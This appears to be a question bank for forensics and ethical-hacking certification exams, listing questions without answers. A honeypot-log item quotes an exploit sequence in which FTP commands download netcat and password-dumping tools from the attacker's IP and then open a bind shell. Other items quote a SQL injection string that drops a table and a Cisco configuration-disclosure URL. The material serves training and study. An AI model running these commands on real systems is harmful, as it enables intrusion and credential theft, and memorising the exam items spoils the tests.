You are a security analyst performing a penetration test for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers: http://172.168.4.131/level/99/exec/show/config After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered?
In General, Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.
What is the target host IP in the following command?
When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:
You are trying to locate Microsoft Outlook Web Access Default Portal using Google search on the Internet. What search string will you use to locate them?
What is the name of the Standard Linux Command that is also available as a Windows application that can be used to create bit-stream images?
Diskcopy is:
The refers to handing over the results of private investigations to the authorities because of indications of criminal activity.
This is original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.
When obtaining a warrant, it is important to:
As a CHFI professional, which of the following is the most important to your professional reputation?
When monitoring for both intrusion and security events between multiple computers, it is essential that the computers' clocks are synchronized. Synchronized time allows an administrator to reconstruct what took place during an attack against multiple computers. Without synchronized time, it is very difficult to determine exactly when specific events took place, and how events interlace. What is the name of the service used to synchronize time among multiple computers?
What header field in the TCP/IP protocol stack involves the hacker exploit known as the Ping of Death?
You just passed your ECSA exam and are about to start your first consulting job running security audits for a financial institution in Los Angeles. The IT manager of the company you will be working for tries to see if you remember your ECSA class. He asks about the methodology you will be using to test the company's network. How would you answer?
Which Federal Rule of Evidence speaks about the Hearsay exception where the availability of the declarant Is immaterial and certain characteristics of the declarant such as present sense Impression, excited utterance, and recorded recollection are also observed while giving their testimony?
A forensic analyst has been tasked with investigating unusual network activity Inside a retail company's network. Employees complain of not being able to access services, frequent rebooting, and anomalies in log files. The Investigator requested log files from the IT administrator and after carefully reviewing them, he finds the following log entry: What type of attack was performed on the companies' web application?
Which of the following is considered as the starting point of a database and stores user data and database objects in an MS SQL server?
A file requires 10 KB space to be saved on a hard disk partition. An entire cluster of 32 KB has been allocated for this file. The remaining, unused space of 22 KB on this cluster will be identified as .
Donald made an OS disk snapshot of a compromised Azure VM under a resource group being used by the affected company as part of forensic analysis process. He then created a VHD file out of the snapshot and stored it in a file share and as a page blob as backup in a storage account under a different region. What is the next thing he should do as a security measure?
An Investigator is checking a Cisco firewall log that reads as follows: Aug 21 2019 09:16:44: %ASA-1-106021: Deny ICMP reverse path check from 10.0.0.44 to 10.0.0.33 on Interface outside. What does %ASA-1-106021 denote?
Steve received a mail that seemed to have come from her bank. The mail has instructions for Steve to click on a link and provide information to avoid the suspension of her account. The link in the mail redirected her to a form asking for details such as name, phone number, date of birth, credit card number or PIN, CW code, SSNs, and email address. On a closer look, Steve realized that the URL of the form is not the same as that of her bank's. Identify the type of external attack performed by the attacker in the above scenario?
In a computer that has Dropbox client installed, which of the following files related to the Dropbox client store information about local Dropbox installation and the Dropbox user account, along with email IDs linked with the account?
Data density of a disk drive is calculated by using
Which list contains the most recent actions performed by a Windows User?
What technique is used by JPEGs for compression?
An investigator has found certain details after analysis of a mobile device. What can reveal the manufacturer information?
What is cold boot (hard boot)?
Which among the following U.S. laws requires financial institutions—companies that offer consumers financial products or services such as loans, financial or investment advice, or insurance—to protect their customers’ information against security threats?
What document does the screenshot represent?
Ron, a computer forensics expert, is investigating a case involving corporate espionage. He has recovered several mobile computing devices from the crime scene. One of the evidence that Ron possesses is a mobile phone from Nokia that was left in ON condition. Ron needs to recover the IMEI number of the device to establish the identity of the device owner. Which of the following key combinations can he use to recover the IMEI number?
Smith is an IT technician that has been appointed to his company's network vulnerability assessment team. He is the only IT employee on the team. The other team members include employees from Accounting, Management, Shipping, and Marketing. Smith and the team members are having their first meeting to discuss how they will proceed. What is the first step they should do to create the network vulnerability assessment plan?
As a Certified Ethical Hacker, you were contracted by a private firm to conduct an external security assessment through penetration testing. What document describes the specifics of the testing, the associated violations, and essentially protects both the organization’s interest and your liabilities as a tester?
Which one of the following is not a first response procedure?
Which of the following files store the MySQL database data permanently, including the data that had been deleted, helping the forensic investigator in examining the case and finding the culprit?
A forensic examiner is examining a Windows system seized from a crime scene. During the examination of a suspect file, he discovered that the file is password protected. He tried guessing the password using the suspect’s available information but without any success. Which of the following tool can help the investigator to solve this issue?
Which of the following is a non-zero data that an application allocates on a hard disk cluster in systems running on Windows OS?
In Linux OS, different log files hold different information, which help the investigators to analyze various issues during a security incident. What information can the investigators obtain from the log file var/log/dmesg?
A section of your forensics lab houses several electrical and electronic equipment. Which type of fire extinguisher you must install in this area to contain any fire incident?
Gill is a computer forensics investigator who has been called upon to examine a seized computer. This computer, according to the police, was used by a hacker who gained access to numerous banking institutions to steal customer information. After preliminary investigations, Gill finds in the computer’s log files that the hacker was able to gain access to these banks through the use of Trojan horses. The hacker then used these Trojan horses to obtain remote access to the companies’ domain controllers. From this point, Gill found that the hacker pulled off the SAM files from the domain controllers to then attempt and crack network passwords. What is the most likely password cracking technique used by this hacker to break the user passwords from the SAM files?
Which of the following statements is incorrect when preserving digital evidence?
Which U.S. law sets the rules for sending emails for commercial purposes, establishes the minimum requirements for commercial messaging, gives the recipients of emails the right to ask the senders to stop emailing them, and spells out the penalties in case the above said rules are violated?
POP3 is an Internet protocol, which is used to retrieve emails from a mail server. Through which port does an email client connect with a POP3 server?
Consider that you are investigating a machine running an Windows OS released prior to Windows Vista. You are trying to gather information about the deleted files by examining the master database file named INFO2 located at C:\Recycler\<USER SID>\. You read an entry named 'Dd5.exe'. What does Dd5.exe mean?
When a user deletes a file, the system creates a $I file to store its details. What detail does the $I file not contain?
Which of the following setups should a tester choose to analyze malware behavior?
Which of the following Linux command searches through the current processes and lists the process IDs those match the selection criteria to stdout?
What is the location of a Protective MBR in a GPT disk layout?
An attacker has compromised a cloud environment of a company and used the employee information to perform an identity theft attack. Which type of attack is this?
Which among the following search warrants allows the first responder to search and seize the victim’s computer components such as hardware, software, storage devices, and documentation?
Which layer of iOS architecture should a forensics investigator evaluate to analyze services such as Threading, File Access, Preferences, Networking and high-level features?
Amelia has got an email from a well-reputed company stating in the subject line that she has won a prize money, whereas the email body says that she has to pay a certain amount for being eligible for the contest. Which of the following acts does the email breach?
You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer Lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine the drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments. What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?
What is the capacity of Recycle bin in a system running on Windows Vista?
Which among the following tools can help a forensic investigator to access the registry files during postmortem analysis?
Pick the statement which does not belong to the Rule 804. Hearsay Exceptions; Declarant Unavailable.
What does Locard's Exchange Principle state?
Jim’s company regularly performs backups of their critical servers. But the company can’t afford to send backup tapes to an off-site vendor for long term storage and archiving. Instead Jim’s company keeps the backup tapes in a safe in the office. Jim’s company is audited each year, and the results from this year’s audit show a risk because backup tapes aren’t stored off-site. The Manager of Information Technology has a plan to take the backup tapes home with him and wants to know what two things he can do to secure the backup tapes while in transit?
Which of the following is a device monitoring tool?
For what purpose do the investigators use tools like iPhoneBrowser, iFunBox, OpenSSHSSH, and iMazing?
Which of the following techniques delete the files permanently?
Checkpoint Firewall logs can be viewed through a Check Point Log viewer that uses icons and colors in the log table to represent different security events and their severity. What does the icon in the checkpoint logs represent?
In Windows, prefetching is done to improve system performance. There are two types of prefetching: boot prefetching and application prefetching. During boot prefetching, what does the Cache Manager do?
Chong-lee, a forensics executive, suspects that a malware is continuously making copies of files and folders on a victim system to consume the available disk space. What type of test would confirm his claim?
Which password cracking technique uses every possible combination of character sets?
What is one method of bypassing a system BIOS password?
Smith, a forensic examiner, was analyzing a hard disk image to find and acquire deleted sensitive files. He stumbled upon a $Recycle.Bin folder in the root directory of the disk. Identify the operating system in use.
What must an investigator do before disconnecting an iPod from any type of computer?
Company ABC has employed a firewall, IDS, Antivirus, Domain Controller, and SIEM. The company’s domain controller goes down. From which system would you begin your investigation?
The investigator wants to examine changes made to the system’s registry by the suspect program. Which of the following tool can help the investigator?
Under confession, an accused criminal admitted to encrypting child pornography pictures and then hiding them within other pictures. What technique did the accused criminal employ?
Which program is the bootloader when Windows XP starts up?
Jack Smith is a forensics investigator who works for Mason Computer Investigation Services. He is investigating a computer that was infected by Ramen Virus. He runs the netstat command on the machine to see its current connections. In the following screenshot, what do the 0.0.0.0 IP addresses signify?
You have been called in to help with an investigation of an alleged network intrusion. After questioning the members of the company IT department, you search through the server log files to find any trace of the intrusion. After that you decide to telnet into one of the company routers to see if there is any evidence to be found. While connected to the router, you see some unusual activity and believe that the attackers are currently connected to that router. You start up an ethereal session to begin capturing traffic on the router that could be used in the investigation. At what layer of the OSI model are you monitoring while watching traffic to and from the router?
What type of equipment would a forensics investigator store in a StrongHold bag?
When searching through file headers for picture file formats, what should be searched to find a JPEG file in hexadecimal format?
What will the following command accomplish in Linux? fdisk /dev/hda
All Blackberry email is eventually sent and received through what proprietary RIM-operated mechanism?
The process of restarting a computer that is already turned on through the operating system is called?
Why would you need to find out the gateway of a device when investigating a wireless attack?
Your company's network just finished going through a SAS 70 audit. This audit reported that overall, your network is secure, but there are some areas that needs improvement. The major area was SNMP security. The audit company recommended turning off SNMP, but that is not an option since you have so many remote nodes to keep track of. What step could you take to help secure SNMP on your network?
You have been given the task to investigate web attacks on a Windows-based server. Which of the following commands will you use to look at the sessions the machine has opened with other systems?
Ivanovich, a forensics investigator, is trying to extract complete information about running processes from a system. Where should he look apart from the RAM and virtual memory?
A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?
What does the 63.78.199.4(161) denote in a Cisco router log? Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet
What layer of the OSI model do TCP and UDP utilize?
Which forensic investigating concept trails the whole incident from how the attack began to how the victim was affected?
John is working on his company policies and guidelines. The section he is currently working on covers company documents; how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents?
When should an MD5 hash check be performed when processing evidence?
What is the slave device connected to the secondary IDE controller on a Linux OS referred to?
Why should you never power on a computer that you need to acquire digital evidence from?
This type of testimony is presented by someone who does the actual fieldwork and does not offer a view in court.
What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network?
An executive has leaked the company trade secrets through an external drive. What process should the investigation team take if they could retrieve his system?
What must be obtained before an investigation is carried out at a location?
While presenting his case to the court, Simon calls many witnesses to the stand to testify. Simon decides to call Hillary Taft, a lay witness, to the stand. Since Hillary is a lay witness, what field would she be considered an expert in?
The following is a log file screenshot from a default installation of IIS 6.0. What time standard is used by IIS as seen in the screenshot?
What is the size value of a nibble?
When marking evidence that has been collected with the “aaa/ddmmyy/nnnn/zz” format, what does the “nnnn” denote?
Richard is extracting volatile data from a system and uses the command doskey/history. What is he trying to extract?
An investigator is searching through the firewall logs of a company and notices ICMP packets that are larger than 65,536 bytes. What type of activity is the investigator seeing?
Where are files temporarily written in Unix when printing?
In Windows Security Event Log, what does an event id of 530 imply?
In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?
What feature of Windows is the following command trying to utilize?
Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is:
If you are concerned about a high level of compression but not concerned about any possible data loss, what type of compression would you use?
What technique used by Encase makes it virtually impossible to tamper with evidence once it has been acquired?
Using Linux to carry out a forensics investigation, what would the following command accomplish? dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror
When an investigator contacts by telephone the domain administrator or controller listed by a whois lookup to request all e-mails sent and received for a user account be preserved, what U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
To calculate the number of bytes on a disk, the formula is: CHS**
A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried out by the attacker by studying the log.
The newer Macintosh Operating System is based on:
Before you are called to testify as an expert, what must an attorney do first?
A suspect is accused of violating the acceptable use of computing resources, as he has visited adult websites and downloaded images. The investigator wants to demonstrate that the suspect did indeed visit these sites. However, the suspect has cleared the search history and emptied the cookie cache. Moreover, he has removed any images he might have downloaded. What can the investigator do to prove the violation? Choose the most feasible option.
In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?
You are assigned to work in the computer forensics lab of a state police agency. While working on a high profile criminal case, you have followed every applicable procedure, however your boss is still concerned that the defense attorney might question whether evidence has been changed while at the lab. What can you do to prove that the evidence is the same as it was when it first entered the lab?
Study the log given below and answer the following question: Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate?
When investigating a potential e-mail crime, what is your first step in the investigation?
If a suspect computer is located in an area that may have toxic chemicals, you must:
The following excerpt is taken from a honeypot log. The log captures activities across three days. There are several intrusion attempts; however, a few are successful. (Note: The objective of this question is to test whether the student can read basic information from log entries and interpret the nature of attack.) Apr 24 14:46:46 [4663]: spp_portscan: portscan detected from 194.222.156.169 Apr 24 14:46:46 [4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482 Apr 24 18:01:05 [4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53 Apr 24 19:04:01 [4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21 Apr 25 08:02:41 [5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53 Apr 25 02:08:07 [5875]: IDS277/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53 Apr 25 02:38:17 [5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111 Apr 25 19:37:32 [5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80 Apr 26 05:45:12 [6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53 Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53 Apr 26 06:44:25 victim7 PAM_pwdb[12509]: (login) session opened for user simple by (uid=0) Apr 26 06:44:36 victim7 PAM_pwdb[12521]: (su) session opened for user simon by simple(uid=506) Apr 26 06:45:34 [6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080 Apr 26 06:52:10 [6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558 From the options given below choose the one which best interprets the following entry: Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
What happens when a file is deleted by a Microsoft operating system using the FAT file system?
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below. "cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00 >>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom" "cmd1.exe /c ftp -s:ftpcom" "cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
During the course of an investigation, you locate evidence that may prove the innocence of the suspect of the investigation. You must maintain an unbiased opinion and be objective in your entire fact finding process. Therefore you report this evidence. This type of evidence is known as:
If you discover a criminal act while investigating a corporate policy abuse, it becomes a public-sector investigation and should be referred to law enforcement?
What binary coding is used most often for e-mail purposes?
If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?
From the following spam mail header, identify the host IP that sent this spam? From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001 Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT) Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT) Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk From: "china hotel web" To: "Shlam" Subject: SHANGHAI (HILTON HOTEL) PACKAGE Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0 X-Priority: 3 X-MSMailPriority: Normal Reply-To: "china hotel web"
If you plan to startup a suspect's computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?
When obtaining a warrant it is important to:
Sectors in hard disks typically contain how many bytes?
Area density refers to:
Corporate investigations are typically easier than public investigations because:
Which of the following should a computer forensics lab used for investigations have?
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?
Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?
Why should you note all cable connections for a computer you want to seize as evidence?
What method of computer forensics will allow you to trace all ever-established user accounts on a Windows 2000 server over the course of its lifetime?
Which response organization tracks hoaxes as well as viruses?
Which federal computer crime law specifically refers to fraud and related activity in connection with access devices like routers?
Office documents (Word, Excel, PowerPoint) contain a code that allows tracking the MAC, or unique identifier, of the machine that created the document. What is that code called?
What TCP/UDP port does the toolkit program netstat use?
In a FAT32 system, a 123 KB file will use how many sectors?
When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?
How many sectors will a 125 KB file use in a FAT32 file system?
You are called by an author who is writing a book and he wants to know how long the copyright for his book will last after he has the book published?
When investigating a network that uses DHCP to assign IP addresses, where would you look to determine which system (MAC address) had a specific IP address at a specific time?
Bob was caught using a remote production system illegally. The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?
To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software?
With regard to using an Antivirus scanner during a computer forensics investigation, you should:
You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?
Which of the following is NOT a graphics file?
When conducting computer forensic analysis, you must guard against ______________ so that you remain focused on the primary job and ensure that the level of work does not increase beyond what was originally expected.
In general, __________________ involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.
When you carve an image, recovering the image depends on which of the following skills?
When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position of the filename in the FAT database.
While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?
What type of file is represented by a colon (:) with a name following it in the Master File Table of an NTFS disk?
An employee is suspected of stealing proprietary information stored on a computer using NTFS Encrypted File System (EFS). If the files were copied to a floppy disk, can the encryption be broken to verify possession?
When examining a hard disk without a write-blocker, you should not start Windows because Windows will write data to the:
You are called in to assist the police in a case involving a password-protected floppy disk. What are two common methods used by password cracking software to obtain the password?
When reviewing web logs, you see an entry for 'resource not found' in the HTTP status code field. What is the actual error code you would see?
Volatile memory is a challenge for forensic analysis because data may disappear on shutdown. In a lab, which option is most appropriate to help capture this data?
What port do you send a fake email to on the company SMTP server?
This is the original file structure database that Microsoft designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.
What should you do when approached by a reporter about a case you are working on or have worked on?
Where did the incident response team go wrong in the case of the erased servers and zip disk?
Why is it important to view the contents of the page or swap file when investigating a Windows System?
What is the correct sequence of events after securing the scene and shutting down the system during a hacking incident investigation?
What does the use of warning banners help a company avoid by overcoming an employee’s assumed right?
What does mactime, a part of the Coroner’s Toolkit, do?
One way to identify the presence of hidden partitions on a suspect's hard drive is to:
What information do you need to recover when searching a victim's computer for a crime committed with a specific email message?
What would be the primary reason to recommend a disk imaging tool instead of a simple DOS copy of files?
What prevents you from discussing a case with the CEO when employed directly by an attorney?
What can an investigator examine to verify that a file has the correct extension?
Which organization maintains a database of hash signatures for known software?
The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity.
What should you do if an employer has no policy reserving the right to inspect computing assets?
Can an employer file a criminal complaint with police if a corporate investigation reveals an employee is committing a crime?
____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.
What is the name of the standard Linux command, also available as a Windows application, that can be used to create bit-stream images?
To preserve digital evidence, an investigator should ____________________
Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been compromised by a hacker, which of the following would be most important in forming a profile of the incident?
An expert witness may give an opinion if:
When using Windows acquisition tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:
Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?
You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?
You discover evidence that a subject is embezzling money from the company. The law enforcement officer requests that you put a network sniffer on the subject's computer. Why do you refuse?
A law enforcement officer may only search for and seize criminal evidence with _______________________, which are facts or circumstances that would lead a reasonable person to believe a crime has been committed or is about to be committed, and evidence of the specific crime exists at the place to be searched.
The police believe that Mevin Mattew has been obtaining unauthorized access to computers belonging to several companies. What is preventing the police from breaking down the suspect’s door and searching his home and seizing all his computer equipment if they have not yet obtained a warrant?
When cataloging digital evidence, the primary goal is to
You are conducting an investigation involving complex text searches. Which tool allows you to efficiently search for a string within a file on the bitmap image of the target computer?
You become aware that a suspect is using ABC Company as their ISP. What assistance can the ISP provide?
A company’s web address leads to a pornographic site when typed in a browser, but the IP address works normally. What type of attack has likely occurred?
A school systems administrator gives you a simple backup copy of a student’s hard drive and requests you investigate for inappropriate images. What type of copy should you request to ensure completeness and admissibility of evidence?
Law enforcement officers legally search a location and observe unrelated evidence in plain view. What doctrine allows this evidence to be admissible?
Microsoft Outlook maintains email messages in a proprietary format in what type of file?
The efforts to obtain information before a trial by demanding documents, depositions, interrogatories, and examination of the scene is a description of what legal term?
The rule of thumb when shutting down a system is to pull the power plug. However, what is a major drawback of this approach?
You are assisting in an investigation of threatening emails. The complainant gives you printed copies of 27 emails. You inform her that you need access to the __________ to track the emails back to the suspect.
Hackers can manipulate Windows Registry for various purposes. Which Registry Hive can be used to load an application at startup?
Which of the following file systems is used by Mac OS X?
When running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
Simon, a former employee, tries to run axfr and ixfr commands using DIG. What is he attempting to do?
What will the following SQL command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email = 'someone@somewhere.com'; DROP TABLE members; --
You suspect firewall issues are preventing SNMP communication with remote offices. Which ports should be opened? (Select 2)
You test a dynamic web page by inputting JavaScript into a search field and receive a pop-up saying: 'This is a test.' What does this indicate?
In IDLE scanning, if an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port, what will be the response?
Michael conducts an XMAS scan using Nmap and most of the ports do not respond. In what state are these ports?
To comply with DoD policy, which requires allowing only incoming connections initiated internally, which type of firewall should be implemented?
Jessica wants to scan her network for live hosts using ICMP ECHO Requests. What type of scan is this?
You are passively footprinting a law firm's web servers. Which tool would you use?
After accessing a Cisco router's config file via a URL, what vulnerability have you discovered? http://172.168.4.131/level/99/exec/show/config
What is the command trying to verify? (Note: The actual command is missing but based on context)
Why were 14-character passwords cracked so quickly after a Group Policy change?
An 'idle' system is also referred to as what?
Larry plans to shut down a city's network using BGP devices and zombies. What type of penetration testing is he performing?
What can you infer from receiving an error message window after typing a quotation mark (?) in the username field on a website?
What information will John be able to gather from Hillary's computer by using Lophtcrack program and sending her an email with a malicious link?
Why do PDF passwords not offer maximum protection when sending through email?
What could have prevented the theft of sensitive information from laptops that were stolen from Meyer Electronics Systems?
What networking protocol language should Kimberly learn that routers utilize?
What IDS feature must George implement to meet the requirement of a 'time-based induction machine' in the state bill?
Why does John not see any of the traffic produced by Firewalk after using a sniffer on a subnet inside his network?
What countermeasure should George take to prevent DDoS attacks on his network?
Why is Nessus not recommended for a stealthy wireless scan?
At what layer of the OSI model do routers function on?
What organization should Frank submit the log to find out if it is a new vulnerability or not?
What filter should George use in Ethereal to monitor only SFTP traffic to and from his network?
Which feature will you disable to eliminate the ability to enumerate information about your Cisco routers?
What is the smallest possible shellcode in Linux?
What kind of results did Jim receive from his vulnerability analysis when exploits were executed on systems deemed not exploitable?
Why would you want to initiate a DoS attack on a system you are testing as a penetration tester?
Why are Linux/Unix based computers better to use than Windows computers for idle scanning?
What operating system would respond to the following command?
What type of attack has the technician performed when they follow employees into restricted areas disguised as an electrician?
What changes should the client company make based on the screenshot presented by Paulette during the audit?
What will the following URL produce in an unpatched IIS Web Server?
What is kept in the following directory? HKLM\SECURITY\Policy\Secrets
Where should Harold navigate on the computer to find the backup SAM file after running rdisk /s command?
What search string will you use to locate Microsoft Outlook Web Access Default Portal using Google search?
When setting up a wireless network with multiple access points, why is it important to set each access point on a different channel?
After normal working hours, you initiate a DoS attack against your external firewall and then initiate an FTP connection from an external IP. The FTP connection is successful even though FTP is blocked at the external firewall. What has happened?
How would you answer if asked about the methodology you will be using to test the company's network after passing your ECSA exam?
After passing her CEH exam, Carol wants to ensure that her network is completely secure. She implements a DMZ, statefull firewall, NAT, IPSEC, and a packet filtering firewall. Since all security measures were taken, none of the hosts on her network can reach the Internet. Why is that?
Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Why will this not be viable to prosecute the intruder?
You have compromised a lower-level administrator account on an Active Directory network of a small company. You discover Domain Controllers through enumeration. You connect to one of the Domain Controllers on port 389 using ldp.exe. What are you trying to accomplish here?
What are the security risks of running a 'repair' installation for Windows XP?
Terri works for a security consulting firm that is currently performing a penetration test on First National Bank in Tokyo. Terri's duties include bypassing firewalls and switches to gain access to the network. Terri sends an IP packet to one of the company's switches with ACK bit and the source address of her machine set. What is Terri trying to accomplish by sending this IP packet?
You are a security analyst performing reconnaissance on a company you will be carrying out a penetration test for. You conduct a search for IT jobs on Dice.com and find the following information for an open position: 7+ years experience in Windows Server environment, 5+ years experience in Exchange 2000/2003 environment, Experience with Cisco Pix Firewall, Linksys 1376 router, Oracle 11i, and MYOB v3.4 Accounting software are required. MCSA desired, MCSE, CEH preferred. What is this information posted on the job website considered?
The objective of this act was to protect consumers' personal financial information held by financial institutions and their service providers.
Why is it a good idea to perform a penetration test from the inside?
Harold is a web designer who has completed a website for ghttech.net. As part of the maintenance agreement he signed with the client, Harold is performing research online and seeing how much exposure the site has received so far. Harold navigates to google.com and types in the following search. link:www.ghttech.net What will this search produce?
A packet is sent to a router that does not have the packet destination address in its route table, how will the packet get to its proper destination address?
James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?
